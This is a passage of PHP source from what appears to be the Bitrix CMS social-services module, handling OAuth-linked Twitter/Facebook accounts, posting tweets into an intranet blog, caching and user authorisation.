}
return false;
}
function CleanParam()
{
global $APPLICATION;
$redirect_url = $APPLICATION->GetCurPageParam('', array("auth_service_id", "check_key"), false);
LocalRedirect($redirect_url);
}
public static function GetUserArrayForSendMessages($userId)
{
$arUserOauth = array();
$userId = intval($userId);
if($userId > 0)
{
$dbSocservUser = CSocServAuthDB::GetList(array(), array('USER_ID' => $userId), false, false, array("ID", "EXTERNAL_AUTH_ID", "OATOKEN"));
while($arOauth = $dbSocservUser->Fetch())
{
if($arOauth["OATOKEN"] <> '' && ($arOauth["EXTERNAL_AUTH_ID"] == "Twitter" || $arOauth["EXTERNAL_AUTH_ID"] == "Facebook"))
$arUserOauth[$arOauth["ID"]] = $arOauth["EXTERNAL_AUTH_ID"];
}
}
if(!empty($arUserOauth))
return $arUserOauth;
return false;
}
public static function SendUserMessage($socServUserId, $providerName, $message, $messageId)
{
$result = false;
$socServUserId = intval($socServUserId);
if($providerName != '' && $socServUserId > 0)
{
switch($providerName)
{
case 'Twitter':
$className = "CSocServTwitter";
break;
case 'Facebook':
$className = "CSocServFacebook";
break;
case 'Odnoklassniki':
$className = "CSocServOdnoklassniki";
break;
default:
$className = "";
}
if($className != "")
$result = call_user_func($className.'::SendUserFeed', $socServUserId, $message, $messageId);
}
return $result;
}
/**
* Publishes messages from Twitter in Buzz corporate portal.
* @static
* @param $arUserTwit
* @param $lastTwitId
* @param $arSiteId
* @return int|null
*/
public static function PostIntoBuzz($arUserTwit, $lastTwitId, $arSiteId=array())
{
if(isset($arUserTwit['statuses']) && !empty($arUserTwit['statuses']))
{
foreach($arUserTwit['statuses'] as $userTwit)
{
if(isset($userTwit["id_str"]))
$lastTwitId = ($userTwit["id_str"].'/' > $lastTwitId.'/') ? $userTwit["id_str"] : $lastTwitId;
if(IsModuleInstalled('bitrix24') && defined('BX24_HOST_NAME'))
{
$userId = $userTwit['kp_user_id'];
$rsUser = CUser::GetByID($userId);
$arUser = $rsUser->Fetch();
foreach(GetModuleEvents("socialservices", "OnPublishSocServMessage", true) as $arEvent)
ExecuteModuleEventEx($arEvent, array($arUser, $userTwit, $arSiteId));
}
else
self::PostIntoBuzzAsBlog($userTwit, $lastTwitId, $arSiteId);
}
return $lastTwitId;
}
return null;
}
public static function PostIntoBuzzAsBlog($userTwit, $arSiteId=array(), $userLogin = '')
{
global $DB;
if(!CModule::IncludeModule("blog") || !CModule::IncludeModule("socialnetwork"))
return;
$arParams = array();
if((IsModuleInstalled('bitrix24') && defined('BX24_HOST_NAME')) && $userLogin != '')
{
if($arUserTwit = unserialize(base64_decode($userTwit)))
$userTwit = $arUserTwit;
if($arSiteIdCheck = unserialize(base64_decode($arSiteId)))
$arSiteId = $arSiteIdCheck;
$dbUser = CUser::GetByLogin($userLogin);
if($arUser = $dbUser->Fetch())
$arParams["USER_ID"] = $arUser["ID"];
}
else
$arParams["USER_ID"] = $userTwit['kp_user_id'];
$siteId = null;
if(isset($arSiteId[$userTwit['kp_user_id']]))
$siteId = $arSiteId[$userTwit['kp_user_id']];
if(strlen($siteId) <= 0)
$siteId = SITE_ID;
if(isset($userTwit['text']))
{
$arParams["GROUP_ID"] = COption::GetOptionString("socialnetwork", "userbloggroup_id", false, $siteId);
$arParams["PATH_TO_BLOG"] = COption::GetOptionString("socialnetwork", "userblogpost_page", false, $siteId);
$arParams["PATH_TO_SMILE"] = COption::GetOptionString("socialnetwork", "smile_page", false, $siteId);
$arParams["NAME_TEMPLATE"] = COption::GetOptionString("main", "TOOLTIP_NAME_TEMPLATE", false, $siteId);
$arParams["SHOW_LOGIN"] = 'Y';
$arParams["PATH_TO_POST"] = $arParams["PATH_TO_BLOG"];
$arFilterblg = Array(
"ACTIVE" => "Y",
"USE_SOCNET" => "Y",
"GROUP_ID" => $arParams["GROUP_ID"],
"GROUP_SITE_ID" => $siteId,
"OWNER_ID" => $arParams["USER_ID"],
);
$groupId = (is_array($arParams["GROUP_ID"]) ? IntVal($arParams["GROUP_ID"][0]) : IntVal($arParams["GROUP_ID"]));
if (isset($GLOBALS["BLOG_POST"]["BLOG_P_".$groupId."_".$arParams["USER_ID"]]) && !empty($GLOBALS["BLOG_POST"]["BLOG_P_".$groupId."_".$arParams["USER_ID"]]))
{
$arBlog = $GLOBALS["BLOG_POST"]["BLOG_P_".$groupId."_".$arParams["USER_ID"]];
}
else
{
$dbBl = CBlog::GetList(Array(), $arFilterblg);
$arBlog = $dbBl ->Fetch();
if (!$arBlog && IsModuleInstalled("intranet"))
$arBlog = CBlog::GetByOwnerID($arParams["USER_ID"]);
$GLOBALS["BLOG_POST"]["BLOG_P_".$groupId."_".$arParams["USER_ID"]] = $arBlog;
}
$arResult["Blog"] = $arBlog;
if(empty($arBlog))
{
if(!empty($arParams["GROUP_ID"]))
{
$arFields = array(
"=DATE_UPDATE" => $DB->CurrentTimeFunction(),
"GROUP_ID" => (is_array($arParams["GROUP_ID"])) ? IntVal($arParams["GROUP_ID"][0]) : IntVal($arParams["GROUP_ID"]),
"ACTIVE" => "Y",
"ENABLE_COMMENTS" => "Y",
"ENABLE_IMG_VERIF" => "Y",
"EMAIL_NOTIFY" => "Y",
"ENABLE_RSS" => "Y",
"ALLOW_HTML" => "N",
"ENABLE_TRACKBACK" => "N",
"SEARCH_INDEX" => "Y",
"USE_SOCNET" => "Y",
"=DATE_CREATE" => $DB->CurrentTimeFunction(),
"PERMS_POST" => Array(
1 => "I",
2 => "I" ),
"PERMS_COMMENT" => Array(
1 => "P",
2 => "P" ),
);
$bRights = false;
$rsUser = CUser::GetByID($arParams["USER_ID"]);
$arUser = $rsUser->Fetch();
if(strlen($arUser["NAME"]."".$arUser["LAST_NAME"]) <= 0)
$arFields["NAME"] = GetMessage("BLG_NAME")." ".$arUser["LOGIN"];
else
$arFields["NAME"] = GetMessage("BLG_NAME")." ".$arUser["NAME"]." ".$arUser["LAST_NAME"];
$arFields["URL"] = str_replace(" ", "_", $arUser["LOGIN"])."-blog-".SITE_ID;
$arFields["OWNER_ID"] = $arParams["USER_ID"];
$urlCheck = preg_replace("/[^a-zA-Z0-9_-]/is", "", $arFields["URL"]);
if ($urlCheck != $arFields["URL"])
{
$arFields["URL"] = "u".$arParams["USER_ID"]."-blog-".SITE_ID;
}
if(CBlog::GetByUrl($arFields["URL"]))
{
$uind = 0;
do
{
$uind++;
$arFields["URL"] = $arFields["URL"].$uind;
}
while (CBlog::GetByUrl($arFields["URL"]));
}
$featureOperationPerms = CSocNetFeaturesPerms::GetOperationPerm(SONET_ENTITY_USER, $arFields["OWNER_ID"], "blog", "view_post");
if ($featureOperationPerms == SONET_RELATIONS_TYPE_ALL)
$bRights = true;
$arFields["PATH"] = CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_BLOG"], array("blog" => $arFields["URL"], "user_id" => $arFields["OWNER_ID"], "group_id" => $arFields["SOCNET_GROUP_ID"]));
$blogID = CBlog::Add($arFields);
if($bRights)
CBlog::AddSocnetRead($blogID);
$arBlog = CBlog::GetByID($blogID, $arParams["GROUP_ID"]);
}
}
// $DATE_PUBLISH = "";
// if(strlen($_POST["DATE_PUBLISH_DEF"]) > 0)
// $DATE_PUBLISH = $_POST["DATE_PUBLISH_DEF"];
// elseif (strlen($_POST["DATE_PUBLISH"])<=0)
$DATE_PUBLISH = ConvertTimeStamp(time() + CTimeZone::GetOffset(), "FULL");
// else
// $DATE_PUBLISH = $_POST["DATE_PUBLISH"];
$arFields=array(
"DETAIL_TEXT" => $userTwit['text'],
"DETAIL_TEXT_TYPE" => "text",
"DATE_PUBLISH" => $DATE_PUBLISH,
"PUBLISH_STATUS" => BLOG_PUBLISH_STATUS_PUBLISH,
"PATH" => CComponentEngine::MakePathFromTemplate(htmlspecialcharsBack($arParams["PATH_TO_POST"]), array("post_id" => "#post_id#", "user_id" => $arBlog["OWNER_ID"])),
"URL" => $arBlog["URL"],
"SOURCE_TYPE" => "twitter",
);
$arFields["PERMS_POST"] = array();
$arFields["PERMS_COMMENT"] = array();
$arFields["MICRO"] = "N";
if(strlen($arFields["TITLE"]) <= 0)
{
$arFields["MICRO"] = "Y";
$arFields["TITLE"] = trim(blogTextParser::killAllTags($arFields["DETAIL_TEXT"]));
if(strlen($arFields["TITLE"]) <= 0)
$arFields["TITLE"] = GetMessage("BLOG_EMPTY_TITLE_PLACEHOLDER");
}
$arFields["SOCNET_RIGHTS"] = Array();
if(!empty($userTwit['user_perms']))
{
$bOne = true;
foreach($userTwit['user_perms'] as $v => $k)
{
if(strlen($v) > 0 && is_array($k) && !empty($k))
{
foreach($k as $vv)
{
if(strlen($vv) > 0)
{
$arFields["SOCNET_RIGHTS"][] = $vv;
if($v != "SG")
$bOne = false;
}
}
}
}
if($bOne && !empty($userTwit['user_perms']["SG"]))
{
$bOnesg = false;
$bFirst = true;
$oGrId = 0;
foreach($userTwit['user_perms']["SG"] as $v)
{
if(strlen($v) > 0)
{
if($bFirst)
{
$bOnesg = true;
$bFirst = false;
$v = str_replace("SG", "", $v);
$oGrId = IntVal($v);
}
else
{
$bOnesg = false;
}
}
}
if($bOnesg)
{
if (!CSocNetFeaturesPerms::CanPerformOperation($arParams["USER_ID"], SONET_ENTITY_GROUP, $oGrId, "blog", "write_post") && !CSocNetFeaturesPerms::CanPerformOperation($arParams["USER_ID"], SONET_ENTITY_GROUP, $oGrId, "blog", "moderate_post") && !CSocNetFeaturesPerms::CanPerformOperation($arParams["USER_ID"], SONET_ENTITY_GROUP, $oGrId, "blog", "full_post"))
$arFields["PUBLISH_STATUS"] = BLOG_PUBLISH_STATUS_READY;
}
}
}
$bError = false;
/* if (CModule::IncludeModule('extranet') && !CExtranet::IsIntranetUser())
{
if(empty($arFields["SOCNET_RIGHTS"]) || in_array("UA", $arFields["SOCNET_RIGHTS"]))
{
$bError = true;
$arResult["ERROR_MESSAGE"] = GetMessage("BLOG_BPE_EXTRANET_ERROR");
}
}*/
$newID = null;
$socnetRightsOld = Array("U" => Array());
if(!$bError)
{
preg_match_all("/\\[user\\s*=\\s*([^\\]]*)\\](.+?)\\[\\/user\\]/ies".BX_UTF_PCRE_MODIFIER, $userTwit['text'], $arMention);
$arFields["=DATE_CREATE"] = $DB->GetNowFunction();
$arFields["AUTHOR_ID"] = $arParams["USER_ID"];
$arFields["BLOG_ID"] = $arBlog["ID"];
$newID = CBlogPost::Add($arFields);
if($newID)
{
$arFields["ID"] = $newID;
$arParamsNotify = Array(
"bSoNet" => true,
"UserID" => $arParams["USER_ID"],
"allowVideo" => $arResult["allowVideo"],
//"bGroupMode" => $arResult["bGroupMode"],
"PATH_TO_SMILE" => $arParams["PATH_TO_SMILE"],
"PATH_TO_POST" => $arParams["PATH_TO_POST"],
"SOCNET_GROUP_ID" => $arParams["GROUP_ID"],
"user_id" => $arParams["USER_ID"],
"NAME_TEMPLATE" => $arParams["NAME_TEMPLATE"],
"SHOW_LOGIN" => $arParams["SHOW_LOGIN"],
);
CBlogPost::Notify($arFields, $arBlog, $arParamsNotify);
}
}
if ($newID > 0 && strlen($arResult["ERROR_MESSAGE"]) <= 0 && $arFields["PUBLISH_STATUS"] == BLOG_PUBLISH_STATUS_PUBLISH) // Record saved successfully
{
BXClearCache(true, "/".SITE_ID."/blog/last_messages_list/");
$arFieldsIM = Array(
"TYPE" => "POST",
"TITLE" => $arFields["TITLE"],
"URL" => CComponentEngine::MakePathFromTemplate(htmlspecialcharsBack($arParams["PATH_TO_POST"]), array("post_id" => $newID, "user_id" => $arBlog["OWNER_ID"])),
"ID" => $newID,
"FROM_USER_ID" => $arParams["USER_ID"],
"TO_USER_ID" => array(),
"TO_SOCNET_RIGHTS" => $arFields["SOCNET_RIGHTS"],
"TO_SOCNET_RIGHTS_OLD" => $socnetRightsOld["U"],
);
if(!empty($arMentionOld))
$arFieldsIM["MENTION_ID_OLD"] = $arMentionOld[1];
if(!empty($arMention))
$arFieldsIM["MENTION_ID"] = $arMention[1];
CBlogPost::NotifyIm($arFieldsIM);
$arParams["ID"] = $newID;
if(!empty($_POST["SPERM"]["SG"]))
{
foreach($_POST["SPERM"]["SG"] as $v)
{
$group_id_tmp = substr($v, 2);
if(IntVal($group_id_tmp) > 0)
CSocNetGroup::SetLastActivity(IntVal($group_id_tmp));
}
}
}
}
}
function GetTwitMessages($lastTwitId = "1", $counter = 1)
{
$oAuthManager = new CSocServAuthManager();
$arActiveSocServ = $oAuthManager->GetActiveAuthServices(array());
if(!(isset($arActiveSocServ["Twitter"]) && isset($arActiveSocServ["Twitter"]["__active"])) || !function_exists("hash_hmac"))
return false;
if(!CModule::IncludeModule("socialnetwork"))
return "CSocServAuthManager::GetTwitMessages(\"$lastTwitId\", $counter);";
global $USER;
$bTmpUserCreated = false;
if(!isset($USER) || !(($USER instanceof CUser) && ('CUser' == get_class($USER))))
{
$bTmpUserCreated = true;
if(isset($USER))
{
$USER_TMP = $USER;
unset($USER);
}
$USER = new CUser();
}
if(intval($lastTwitId) <= 1 || $counter == 1)
$lastTwitId = COption::GetOptionString('socialservices', 'last_twit_id', '1');
$socServUserArray = self::GetUserArray('Twitter');
$arSiteId = array();
if(isset($socServUserArray[3]) && is_array($socServUserArray[3]))
$arSiteId = $socServUserArray[3];
$twitManager = new CSocServTwitter();
$arUserTwit = $twitManager->GetUserMessage($socServUserArray, $lastTwitId);
if(is_array($arUserTwit))
{
if(isset($arUserTwit["statuses"]) && !empty($arUserTwit["statuses"]))
$lastTwitId = self::PostIntoBuzz($arUserTwit, $lastTwitId, $arSiteId);
elseif((is_array($arUserTwit["search_metadata"]) && isset($arUserTwit["search_metadata"]["max_id_str"])) && (strlen($arUserTwit["search_metadata"]["max_id_str"]) > 0))
$lastTwitId = $arUserTwit["search_metadata"]["max_id_str"];
}
$counter++;
if($counter >= 20)
{
// $oldLastId = COption::GetOptionString('socialservices', 'last_twit_id', '1');
// if((strlen($lastTwitId) > strlen($oldLastId)) && $oldLastId[0] != 9)
// $lastTwitId = substr($lastTwitId, 1);
COption::SetOptionString('socialservices', 'last_twit_id', $lastTwitId);
$counter = 1;
}
$lastTwitId = preg_replace("|\D|", '', $lastTwitId);
if($bTmpUserCreated)
{
unset($USER);
if(isset($USER_TMP))
{
$USER = $USER_TMP;
unset($USER_TMP);
}
}
return "CSocServAuthManager::GetTwitMessages(\"$lastTwitId\", $counter);";
}
public static function SendSocialservicesMessages()
{
$oAuthManager = new CSocServAuthManager();
$arActiveSocServ = $oAuthManager->GetActiveAuthServices(array());
if(!(isset($arActiveSocServ["Twitter"]) && isset($arActiveSocServ["Twitter"]["__active"])) || !function_exists("hash_hmac"))
return false;
$ttl = 86400;
$cache_id = 'socserv_mes_user';
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_mes_user';
$arSocServMessage = array();
if($obCache->InitCache($ttl, $cache_id, $cache_dir))
$arSocServMessage = $obCache->GetVars();
else
{
$dbSocServMessage = CSocServMessage::GetList(array(), array('SUCCES_SENT' => 'N'), false, array("nTopCount" => 5), array("ID", "SOCSERV_USER_ID", "PROVIDER", "MESSAGE"));
while($arSocMessage = $dbSocServMessage->Fetch())
$arSocServMessage[] = $arSocMessage;
if(empty($arSocServMessage))
if($obCache->StartDataCache())
$obCache->EndDataCache($arSocServMessage);
}
if(is_array($arSocServMessage) && !empty($arSocServMessage))
foreach($arSocServMessage as $arSocMessage)
{
$arResult = CSocServAuthManager::SendUserMessage($arSocMessage['SOCSERV_USER_ID'], $arSocMessage['PROVIDER'], $arSocMessage['MESSAGE'], $arSocMessage['ID']);
if($arResult !== false && is_array($arResult) && !preg_match("/error/i", join(",", array_keys($arResult))))
self::MarkMessageAsSent($arSocMessage['ID']);
}
return "CSocServAuthManager::SendSocialservicesMessages();";
}
private static function MarkMessageAsSent($id)
{
CSocServMessage::Update($id, array("SUCCES_SENT" => 'Y'));
}
public function GetUserArray($authId)
{
$ttl = 10000;
$cache_id = 'socserv_ar_user';
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_ar_user';
if($obCache->InitCache($ttl, $cache_id, $cache_dir))
{
$arResult = $obCache->GetVars();
}
else
{
$arUserXmlId = $arOaToken = $arOaSecret = $arSiteId = array();
$dbSocUser = CSocServAuthDB::GetList(array(), array('EXTERNAL_AUTH_ID' => $authId, "ACTIVE" => 'Y'), false, false, array("XML_ID", "USER_ID", "OATOKEN", "OASECRET", "SITE_ID"));
while($arSocUser = $dbSocUser->Fetch())
{
$arUserXmlId[$arSocUser["USER_ID"]] = $arSocUser["XML_ID"];
$arOaToken[$arSocUser["USER_ID"]] = $arSocUser["OATOKEN"];
$arOaSecret[$arSocUser["USER_ID"]] = $arSocUser["OASECRET"];
$arSiteId[$arSocUser["USER_ID"]] = $arSocUser["SITE_ID"];
}
$arResult = array($arUserXmlId, $arOaToken, $arOaSecret, $arSiteId);
if($obCache->StartDataCache())
$obCache->EndDataCache($arResult);
}
return $arResult;
}
public static function GetCachedUserOption($option)
{
global $USER;
$result = '';
if(is_object($USER))
{
$userId = $USER->GetID();
$ttl = 10000;
$cache_id = 'socserv_user_option_'.$userId;
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_user_option';
if($obCache->InitCache($ttl, $cache_id, $cache_dir))
$result = $obCache->GetVars();
else
{
$result = CUtil::JSEscape(CUserOptions::GetOption("socialservices", $option, "N", $USER->GetID()));
if($obCache->StartDataCache())
$obCache->EndDataCache($result);
}
}
return $result;
}
public static function checkOldUser(&$socservUserFields)
{
// check for user with old socialservices linking system (socservice ID in user's EXTERNAL_AUTH_ID)
$dbUsersOld = CUser::GetList($by = 'ID', $ord = 'ASC', array('XML_ID' => $socservUserFields['XML_ID'], 'EXTERNAL_AUTH_ID' => $socservUserFields['EXTERNAL_AUTH_ID'], 'ACTIVE' => 'Y'), array('NAV_PARAMS' => array("nTopCount" => "1")));
$socservUser = $dbUsersOld->Fetch();
if($socservUser)
{
return $socservUser["ID"];
}
return false;
}
public static function checkAbandonedUser(&$socservUserFields)
{
// theoretically possible situation with abandoned external user w/o b_socialservices_user entry
$dbUsersNew = CUser::GetList($by = 'ID', $ord = 'ASC', array('XML_ID' => $socservUserFields['XML_ID'], 'EXTERNAL_AUTH_ID' => 'socservices', 'ACTIVE' => 'Y'), array('NAV_PARAMS' => array("nTopCount" => "1")));
$socservUser = $dbUsersNew->Fetch();
if($socservUser)
{
return $socservUser["ID"];
}
return false;
}
}
//base class for auth services
class CSocServAuth
{
protected static $settingsSuffix = false;
protected $checkRestrictions = true;
protected $allowChangeOwner = true;
protected $userId = null;
function __construct($userId = null)
{
global $USER;
if($userId === null)
{
if(is_object($USER) && $USER->IsAuthorized())
{
$this->userId = $USER->GetID();
}
}
else
{
$this->userId = $userId;
}
}
public static function getControllerUrl()
{
return 'https://www.bitrix24.com/controller';
// this may be needed later
/*
static $controllerUrl = '';
if(
$controllerUrl === ''
&& \Bitrix\Main\Loader::includeModule('bitrix24')
)
{
$controllerUrl = 'https://www.bitrix24.com/controller';
$controllerUrlList = array(
'de' => 'https://www.bitrix24.de/controller',
'ua' => 'https://www.bitrix24.ua/controller',
'ru' => 'https://www.bitrix24.ru/controller',
'eu' => 'https://www.bitrix24.eu/controller',
'la' => 'https://www.bitrix24.es/controller',
'br' => 'https://www.bitrix24.com.br/controller',
'in' => 'https://www.bitrix24.in/controller',
'cn' => 'https://www.bitrix24.cn/controller',
'kz' => 'https://www.bitrix24.kz/controller',
'by' => 'https://www.bitrix24.by/controller',
'fr' => 'https://www.bitrix24.fr/controller',
'pl' => 'https://www.bitrix24.pl/controller',
);
$lang = \CBitrix24::getLicensePrefix();
if(array_key_exists($lang, $controllerUrlList))
{
$controllerUrl = $controllerUrlList[$lang];
}
}
return $controllerUrl;
*/
}
public function GetSettings()
{
return false;
}
protected function CheckFields($action, &$arFields)
{
global $USER;
if($action === 'ADD')
{
if(isset($arFields["EXTERNAL_AUTH_ID"]) && strlen($arFields["EXTERNAL_AUTH_ID"])<=0)
{
return false;
}
if(isset($arFields["SITE_ID"]) && strlen($arFields["SITE_ID"])<=0)
{
$arFields["SITE_ID"] = SITE_ID;
}
if(!isset($arFields["USER_ID"]))
{
$arFields["USER_ID"] = $USER->GetID();
}
$dbCheck = CSocServAuthDB::GetList(array(), array("USER_ID" => $arFields["USER_ID"], "EXTERNAL_AUTH_ID" => $arFields["EXTERNAL_AUTH_ID"]), false, false, array("ID"));
if($dbCheck->Fetch())
{
return false;
}
}
if(is_set($arFields, "PERSONAL_PHOTO"))
{
$res = CFile::CheckImageFile($arFields["PERSONAL_PHOTO"]);
if(strlen($res)>0)
{
unset($arFields["PERSONAL_PHOTO"]);
}
else
{
$arFields["PERSONAL_PHOTO"]["MODULE_ID"] = "socialservices";
CFile::SaveForDB($arFields, "PERSONAL_PHOTO", "socialservices");
}
}
return true;
}
static function Update($id, $arFields)
{
global $DB;
$id = intval($id);
if($id <= 0)
{
return false;
}
foreach(GetModuleEvents("socialservices", "OnBeforeSocServUserUpdate", true) as $arEvent)
{
if(ExecuteModuleEventEx($arEvent, array($id, &$arFields)) === false)
{
return false;
}
}
if(!self::CheckFields('UPDATE', $arFields))
{
return false;
}
$strUpdate = $DB->PrepareUpdate("b_socialservices_user", $arFields);
$strSql = "UPDATE b_socialservices_user SET ".$strUpdate." WHERE ID = ".$id." ";
$DB->Query($strSql, false, "File: ".__FILE__."<br>Line: ".__LINE__);
$cache_id = 'socserv_ar_user';
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_ar_user';
$obCache->Clean($cache_id, $cache_dir);
$arFields['ID'] = $id;
foreach(GetModuleEvents("socialservices", "OnAfterSocServUserUpdate", true) as $arEvent)
ExecuteModuleEventEx($arEvent, array(&$arFields));
return $id;
}
public static function Delete($id)
{
global $DB;
$id = intval($id);
if ($id > 0)
{
$rsUser = $DB->Query("SELECT ID FROM b_socialservices_user WHERE ID=".$id);
$arUser = $rsUser->Fetch();
if(!$arUser)
return false;
foreach(GetModuleEvents("socialservices", "OnBeforeSocServUserDelete", true) as $arEvent)
ExecuteModuleEventEx($arEvent, array($id));
$DB->Query("DELETE FROM b_socialservices_user WHERE ID = ".$id." ", true);
$cache_id = 'socserv_ar_user';
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_ar_user';
$obCache->Clean($cache_id, $cache_dir);
return true;
}
return false;
}
function OnUserDelete($id)
{
global $DB;
$id = intval($id);
if ($id > 0)
{
$DB->Query("DELETE FROM b_socialservices_user WHERE USER_ID = ".$id." ", true);
return true;
}
return false;
}
function OnAfterTMReportDailyAdd()
{
if(COption::GetOptionString("socialservices", "allow_send_user_activity", "Y") != 'Y')
return;
global $USER;
$arIntranetData = $arResult = $arData = array();
$eventCounter = $taskCounter = 0;
if(CModule::IncludeModule('intranet'))
{
$arIntranetData = CIntranetPlanner::getData(SITE_ID, true);
}
if(isset($arIntranetData['DATA']))
{
$arData = $arIntranetData['DATA'];
}
if(isset($arData['EVENTS']) && is_array($arData['EVENTS']))
{
$eventCounter = count($arData['EVENTS']);
}
if(isset($arData['TASKS']) && is_array($arData['TASKS']))
{
$taskCounter = count($arData['TASKS']);
}
$arResult['USER_ID'] = intval($USER->GetID());
if($arResult['USER_ID'] > 0)
{
$enabledSendMessage = CUserOptions::GetOption("socialservices", "user_socserv_enable", "N", $arResult['USER_ID']);
if($enabledSendMessage == 'Y')
{
$enabledEndDaySend = CUserOptions::GetOption("socialservices", "user_socserv_end_day", "N", $arResult['USER_ID']);
if($enabledEndDaySend == 'Y')
{
$arResult['MESSAGE'] = str_replace('#event#', $eventCounter, str_replace('#task#', $taskCounter, CUserOptions::GetOption("socialservices", "user_socserv_end_text", GetMessage("JS_CORE_SS_WORKDAY_START"), $arResult['USER_ID'])));
$socServArray = CUserOptions::GetOption("socialservices", "user_socserv_array", "a:0:{}", $arResult['USER_ID']);
if(!CheckSerializedData($socServArray))
{
$socServArray = "a:0:{}";
}
$arSocServUser['SOCSERVARRAY'] = unserialize($socServArray);
if(is_array($arSocServUser['SOCSERVARRAY']) && count($arSocServUser['SOCSERVARRAY']) > 0)
{
foreach($arSocServUser['SOCSERVARRAY'] as $id => $providerName)
{
$arResult['SOCSERV_USER_ID'] = $id;
$arResult['PROVIDER'] = $providerName;
CSocServMessage::Add($arResult);
}
}
}
}
}
}
function OnAfterTMDayStart()
{
if(COption::GetOptionString("socialservices", "allow_send_user_activity", "Y") != 'Y')
return;
global $USER;
$arResult = array();
$arResult['USER_ID'] = intval($USER->GetID());
if($arResult['USER_ID'] > 0)
{
$enabledSendMessage = CUserOptions::GetOption("socialservices", "user_socserv_enable", "N", $arResult['USER_ID']);
if($enabledSendMessage == 'Y')
{
$enabledEndDaySend = CUserOptions::GetOption("socialservices", "user_socserv_start_day", "N", $arResult['USER_ID']);
if($enabledEndDaySend == 'Y')
{
$arResult['MESSAGE'] = CUserOptions::GetOption("socialservices", "user_socserv_start_text", GetMessage("JS_CORE_SS_WORKDAY_START"), $arResult['USER_ID']);
$socServArray = CUserOptions::GetOption("socialservices", "user_socserv_array", "a:0:{}", $arResult['USER_ID']);
if(!CheckSerializedData($socServArray))
{
$socServArray = "a:0:{}";
}
$arSocServUser['SOCSERVARRAY'] = unserialize($socServArray);
if(is_array($arSocServUser['SOCSERVARRAY']) && count($arSocServUser['SOCSERVARRAY']) > 0)
{
foreach($arSocServUser['SOCSERVARRAY'] as $id => $providerName)
{
$arResult['SOCSERV_USER_ID'] = $id;
$arResult['PROVIDER'] = $providerName;
CSocServMessage::Add($arResult);
}
}
}
}
}
}
public function CheckSettings()
{
$arSettings = $this->GetSettings();
if(is_array($arSettings))
{
foreach($arSettings as $sett)
if(is_array($sett) && !array_key_exists("note", $sett))
if(self::GetOption($sett[0]) == '')
return false;
}
return true;
}
public function CheckPhotoURI($photoURI)
{
if(preg_match("|^http[s]?://|i", $photoURI))
return true;
return false;
}
public static function OptionsSuffix()
{
//settings depend on current site
$arUseOnSites = unserialize(COption::GetOptionString("socialservices", "use_on_sites", ""));
return ($arUseOnSites[SITE_ID] == "Y"? '_bx_site_'.SITE_ID : '');
}
public static function GetOption($opt)
{
if(self::$settingsSuffix === false)
self::$settingsSuffix = self::OptionsSuffix();
return COption::GetOptionString("socialservices", $opt.self::$settingsSuffix);
}
public static function SetOption($opt, $value)
{
if(self::$settingsSuffix === false)
self::$settingsSuffix = self::OptionsSuffix();
return COption::SetOptionString("socialservices", $opt.self::$settingsSuffix, $value);
}
public static function getGroupsDenyAuth()
{
return explode(',', (\COption::GetOptionString("socialservices", "group_deny_auth", "")));
}
public static function getGroupsDenySplit()
{
return explode(',', (\COption::GetOptionString("socialservices", "group_deny_split", "")));
}
public static function setGroupsDenyAuth($value)
{
\COption::SetOptionString('socialservices', 'group_deny_auth', is_array($value) ? implode(',', $value) : '');
}
public static function setGroupsDenySplit($value)
{
\COption::SetOptionString('socialservices', 'group_deny_split', is_array($value) ? implode(',', $value) : '');
}
public static function isSplitDenied($arGroups = null)
{
global $USER;
if($arGroups === null)
{
return $USER->IsAuthorized()
&& count(array_intersect(self::getGroupsDenySplit(), $USER->GetUserGroupArray())) > 0;
}
else
{
return count(array_intersect(self::getGroupsDenySplit(), $arGroups)) > 0;
}
}
public static function isAuthDenied($arGroups)
{
return count(array_intersect(self::getGroupsDenyAuth(), $arGroups)) > 0;
}
public function AuthorizeUser($socservUserFields)
{
global $USER, $APPLICATION;
if(!isset($socservUserFields['XML_ID']) || $socservUserFields['XML_ID'] == '')
{
return false;
}
if(!isset($socservUserFields['EXTERNAL_AUTH_ID']) || $socservUserFields['EXTERNAL_AUTH_ID'] == '')
{
return false;
}
$oauthKeys = array();
if(isset($socservUserFields["OATOKEN"]))
{
$oauthKeys["OATOKEN"] = $socservUserFields["OATOKEN"];
}
if(isset($socservUserFields["REFRESH_TOKEN"]) && $socservUserFields["REFRESH_TOKEN"] !== '')
{
$oauthKeys["REFRESH_TOKEN"] = $socservUserFields["REFRESH_TOKEN"];
}
if(isset($socservUserFields["OATOKEN_EXPIRES"]))
{
$oauthKeys["OATOKEN_EXPIRES"] = $socservUserFields["OATOKEN_EXPIRES"];
}
$errorCode = SOCSERV_AUTHORISATION_ERROR;
$dbSocUser = UserTable::getList(array(
'filter' => array(
'=XML_ID'=>$socservUserFields['XML_ID'],
'=EXTERNAL_AUTH_ID'=>$socservUserFields['EXTERNAL_AUTH_ID']
),
'select' => array("ID", "USER_ID", "ACTIVE" => "USER.ACTIVE"),
));
$socservUser = $dbSocUser->fetch();
if($USER->IsAuthorized())
{
if(!$this->checkRestrictions || !self::isSplitDenied())
{
if(!$socservUser)
{
$socservUserFields["USER_ID"] = $USER->GetID();
$result = UserTable::add(UserTable::filterFields($socservUserFields));
$id = $result->getId();
}
else
{
$id = $socservUser['ID'];
// socservice link split
if($socservUser['USER_ID'] != $USER->GetID())
{
if($this->allowChangeOwner)
{
$dbSocUser = UserTable::getList(array(
'filter' => array(
'=USER_ID' => $USER->GetID(),
'=EXTERNAL_AUTH_ID' => $socservUserFields['EXTERNAL_AUTH_ID']
),
'select' => array("ID")
));
if($dbSocUser->fetch())
{
return SOCSERV_AUTHORISATION_ERROR;
}
else
{
$oauthKeys['USER_ID'] = $USER->GetID();
$oauthKeys['CAN_DELETE'] = 'Y';
}
}
else
{
return SOCSERV_AUTHORISATION_ERROR;
}
}
}
if($_SESSION["OAUTH_DATA"] && is_array($_SESSION["OAUTH_DATA"]))
{
$oauthKeys = array_merge($oauthKeys, $_SESSION['OAUTH_DATA']);
unset($_SESSION["OAUTH_DATA"]);
}
UserTable::update($id, $oauthKeys);
}
else
{
return SOCSERV_REGISTRATION_DENY;
}
}
else
{
$entryId = 0;
$USER_ID = 0;
if($socservUser)
{
$entryId = $socservUser['ID'];
if($socservUser["ACTIVE"] === 'Y')
{
